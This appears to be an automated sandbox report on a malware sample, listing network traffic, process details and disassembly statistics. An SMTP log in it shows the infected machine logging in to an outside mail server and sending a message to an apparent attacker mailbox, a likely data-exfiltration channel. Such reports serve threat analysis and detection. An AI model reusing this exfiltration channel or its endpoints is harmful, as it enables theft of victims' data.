Nov 5, 2024 16:05:09.245628119 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.245657921 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:09.246100903 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.246134043 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:09.250422955 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.409636974 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.410505056 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:09.410572052 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:09.410609961 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:09.410625935 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:09.415962934 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.415972948 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.416086912 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.416096926 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.606158018 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.661096096 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:06:46.732836008 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:06:46.737782955 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:06:46.896697998 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:06:46.896831989 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:06:46.902301073 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:06:46.902365923 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 5, 2024 16:05:04.509944916 CET | 63854 | 53 | 192.168.2.7 | 1.1.1.1 |
Nov 5, 2024 16:05:04.709742069 CET | 53 | 63854 | 1.1.1.1 | 192.168.2.7 |
Nov 5, 2024 16:05:22.278187037 CET | 53 | 57486 | 1.1.1.1 | 192.168.2.7 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Nov 5, 2024 16:05:04.509944916 CET | 192.168.2.7 | 1.1.1.1 | 0x677d | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Nov 5, 2024 16:05:04.709742069 CET | 1.1.1.1 | 192.168.2.7 | 0x677d | No error (0) | | | 172.67.74.152 | A (IP address) | IN (0x0001) | false |
Nov 5, 2024 16:05:04.709742069 CET | 1.1.1.1 | 192.168.2.7 | 0x677d | No error (0) | | | 104.26.12.205 | A (IP address) | IN (0x0001) | false |
Nov 5, 2024 16:05:04.709742069 CET | 1.1.1.1 | 192.168.2.7 | 0x677d | No error (0) | | | 104.26.13.205 | A (IP address) | IN (0x0001) | false |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.7 | 49704 | 172.67.74.152 | 443 | 7908 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-11-05 15:05:05 UTC | 155 | OUT | |
2024-11-05 15:05:05 UTC | 399 | IN | |
2024-11-05 15:05:05 UTC | 14 | IN |
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
Nov 5, 2024 16:05:07.448519945 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 220 server1.educt.shop127.0.0.1 ESMTP Postfix |
Nov 5, 2024 16:05:07.449330091 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | EHLO 830021 |
Nov 5, 2024 16:05:07.610507965 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250-server1.educt.shop127.0.0.1 250-PIPELINING 250-SIZE 204800000 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING |
Nov 5, 2024 16:05:07.611438990 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | AUTH login c2VuZHhzZW5zZXNAdmV0cnlzLnNob3A= |
Nov 5, 2024 16:05:07.773389101 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 334 UGFzc3dvcmQ6 |
Nov 5, 2024 16:05:07.942066908 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 235 2.7.0 Authentication successful |
Nov 5, 2024 16:05:07.942506075 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | MAIL FROM:<sendxsenses@vetrys.shop> |
Nov 5, 2024 16:05:08.103552103 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250 2.1.0 Ok |
Nov 5, 2024 16:05:08.103756905 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | RCPT TO:<senses@vetrys.shop> |
Nov 5, 2024 16:05:09.244976044 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250 2.1.5 Ok |
Nov 5, 2024 16:05:09.245137930 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | DATA |
Nov 5, 2024 16:05:09.245445967 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250 2.1.5 Ok |
Nov 5, 2024 16:05:09.245628119 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250 2.1.5 Ok |
Nov 5, 2024 16:05:09.246100903 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250 2.1.5 Ok |
Nov 5, 2024 16:05:09.409636974 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 354 End data with <CR><LF>.<CR><LF> |
Nov 5, 2024 16:05:09.410625935 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | . |
Nov 5, 2024 16:05:09.606158018 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250 2.0.0 Ok: queued as 313B76F1DE |
Nov 5, 2024 16:06:46.732836008 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | QUIT |
Nov 5, 2024 16:06:46.896697998 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 221 2.0.0 Bye |
Target ID: | 4 |
Start time: | 10:04:57 |
Start date: | 05/11/2024 |
Path: | C:\Users\user\Desktop\D6yz87XjgM.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 1'653'512 bytes |
MD5 hash: | EB180D9AC3C0EE0FEB1B997EF3908F36 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Reputation: | low |
Has exited: | true |
Target ID: | 7 |
Start time: | 10:05:02 |
Start date: | 05/11/2024 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x230000 |
File size: | 65'440 bytes |
MD5 hash: | 0D5DF43AF2916F47D00C1573797C1A13 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 10:05:02 |
Start date: | 05/11/2024 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xb90000 |
File size: | 65'440 bytes |
MD5 hash: | 0D5DF43AF2916F47D00C1573797C1A13 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Reputation: | high |
Has exited: | false |
Execution Graph
Execution Coverage: | 22% |
Dynamic/Decrypted Code Coverage: | 9.4% |
Signature Coverage: | 6.5% |
Total number of Nodes: | 551 |
Total number of Limit Nodes: | 67 |
Function | Relevance | APIs | Strings | Instructions | Tags |
---|---|---|---|---|---|
02272B06 | 28.4 | 11 | 5 | 369 | native, thread, process, COMMON |
02272B02 | 28.4 | 11 | 5 | 352 | native, COMMON |
02272AF7 | 28.3 | 11 | 5 | 343 | native, COMMON |
0054A57F | 7.2 | 3 | 1 | 153 | native, memory, COMMON |
0054AF1D | 194.9 | 108 | 3 | 691 | library, memory, loader, COMMON |
0054C6E3 | 155.5 | 103 | - | 974 | COMMON |
0054E785 | 107.2 | 59 | 2 | 441 | memory, COMMON |
0057C62D | 105.7 | 70 | - | 747 | COMMON |
0054EE42 | 100.2 | 56 | 1 | 453 | memory, COMMON |
0054D6DB | 55.9 | 37 | - | 361 | COMMON |
0054D40C | 39.2 | 26 | - | 206 | COMMON |
0057C48C | 15.1 | 10 | - | 114 | COMMON |
0054AD9F | 4.5 | 3 | - | 44 | COMMON |
0054F3F4 | 1.5 | 1 | - | 39 | COMMON |
0057C3B4 | 1.5 | 1 | - | 20 | COMMON |
0054A7DA | 1.3 | - | 1 | 32 | COMMON |
0054AB35 | .0 | - | - | 42 | COMMON |
022730D7 | .0 | - | - | 28 | COMMON |
0054A84C | .0 | - | - | 7 | COMMON |
0054A860 | .0 | - | - | 6 | COMMON |
02276A17 | .0 | - | - | 4 | COMMON |
022768DC | .0 | - | - | 4 | COMMON |
0227690D | .0 | - | - | 4 | COMMON |
02276965 | .0 | - | - | 4 | COMMON |
02276C57 | .0 | - | - | 3 | COMMON |
02276F4D | .0 | - | - | 3 | COMMON |
0054FF9F | 69.3 | 46 | - | 301 | COMMON |
0054C5B5 | 19.6 | 13 | - | 74 | COMMON |
0054C40E | 12.0 | 8 | - | 48 | COMMON |
0054C087 | 9.1 | 6 | - | 67 | COMMON |
0057D330 | 9.1 | 6 | - | 66 | COMMON |
0054C182 | 9.0 | 6 | - | 34 | COMMON |
0057D41B | 7.6 | 5 | - | 86 | COMMON |
0054F50E | 7.6 | 5 | - | 63 | COMMON |
0057D250 | 7.5 | 5 | - | 42 | COMMON |
0054AE7C | 7.5 | 5 | - | 33 | COMMON |
0057D0E2 | 6.0 | 4 | - | 43 | COMMON |
0054C4C4 | 6.0 | 4 | - | 28 | COMMON |
Execution Graph
Execution Coverage: | 8.4% |
Dynamic/Decrypted Code Coverage: | 81.3% |
Signature Coverage: | 0% |
Total number of Nodes: | 107 |
Total number of Limit Nodes: | 9 |
Function | Relevance | APIs | Strings | Instructions | Tags |
---|---|---|---|---|---|
068C1018 | 8.0 | - | 6 | 545 | COMMON |
02EAAA32 | 4.0 | - | 1 | 2738 | COMMON |
068C5D50 | 3.0 | - | 2 | 487 | COMMON |
068CE0D9 | 2.8 | - | 2 | 337 | COMMON |
02EADBE0 | 2.3 | - | - | 2305 | COMMON |
068C3560 | 1.9 | - | 1 | 604 | COMMON |
068C02F8 | 1.0 | - | - | 1019 | COMMON |
068C45C0 | .8 | - | - | 818 | COMMON |
068CA150 | .6 | - | - | 645 | COMMON |
068C91F8 | .6 | - | - | 579 | COMMON |
02EA4AA0 | .3 | - | - | 266 | COMMON |
02EA3E88 | .2 | - | - | 238 | COMMON |
06A1D490 | 1.7 | 1 | - | 152 | COMMON |
068CE571 | 1.6 | 1 | - | 133 | COMMON |
06A1A464 | 1.6 | 1 | - | 116 | COMMON |
06A1E46C | 1.6 | 1 | - | 97 | COMMON |
068CE658 | 1.6 | 1 | - | 52 | COMMON |
02EA6EF8 | 1.4 | - | 1 | 166 | COMMON |
02EA7D98 | 1.4 | - | 1 | 141 | COMMON |
02EA7DA8 | 1.3 | - | 1 | 95 | COMMON |
02EA6BC0 | 1.3 | - | 1 | 50 | COMMON |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA6BB0 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA8FB8 Relevance: .9, Instructions: 940COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA8FC8 Relevance: .9, Instructions: 934COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA86C0 Relevance: .6, Instructions: 611COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA4A96 Relevance: .3, Instructions: 259COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EAA1C2 Relevance: .3, Instructions: 251COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA3E7E Relevance: .2, Instructions: 234COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EAA6D8 Relevance: .2, Instructions: 213COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA4818 Relevance: .2, Instructions: 180COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA480C Relevance: .2, Instructions: 179COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EAA510 Relevance: .1, Instructions: 144COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA6764 Relevance: .1, Instructions: 135COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA677C Relevance: .1, Instructions: 134COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA6CEE Relevance: .1, Instructions: 134COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA1108 Relevance: .1, Instructions: 133COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EAA502 Relevance: .1, Instructions: 121COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA1138 Relevance: .1, Instructions: 112COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA26E4 Relevance: .1, Instructions: 93COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA26F0 Relevance: .1, Instructions: 90COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EAA080 Relevance: .1, Instructions: 82COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EAA090 Relevance: .1, Instructions: 78COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA9F80 Relevance: .1, Instructions: 77COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA16A8 Relevance: .1, Instructions: 76COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA1382 Relevance: .1, Instructions: 74COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA1880 Relevance: .1, Instructions: 73COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA4F90 Relevance: .1, Instructions: 73COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 013BD030 Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA1890 Relevance: .1, Instructions: 70COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA9F90 Relevance: .1, Instructions: 70COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA16B8 Relevance: .1, Instructions: 69COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA4FA0 Relevance: .1, Instructions: 68COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA1390 Relevance: .1, Instructions: 66COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA17C8 Relevance: .1, Instructions: 65COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA0848 Relevance: .1, Instructions: 62COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA0838 Relevance: .1, Instructions: 62COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA1492 Relevance: .1, Instructions: 61COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA17D8 Relevance: .1, Instructions: 54COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA14A0 Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 013BD02B Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EAA6CA Relevance: .1, Instructions: 52COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA8F20 Relevance: .0, Instructions: 39COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA7EC0 Relevance: .0, Instructions: 34COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA8F30 Relevance: .0, Instructions: 33COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068C5670 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068CC370 Relevance: 4.3, Strings: 3, Instructions: 576COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068C3CAB Relevance: 2.9, Strings: 2, Instructions: 421COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02EA41D0 Relevance: .3, Instructions: 281COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06A1A198 Relevance: .3, Instructions: 264COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|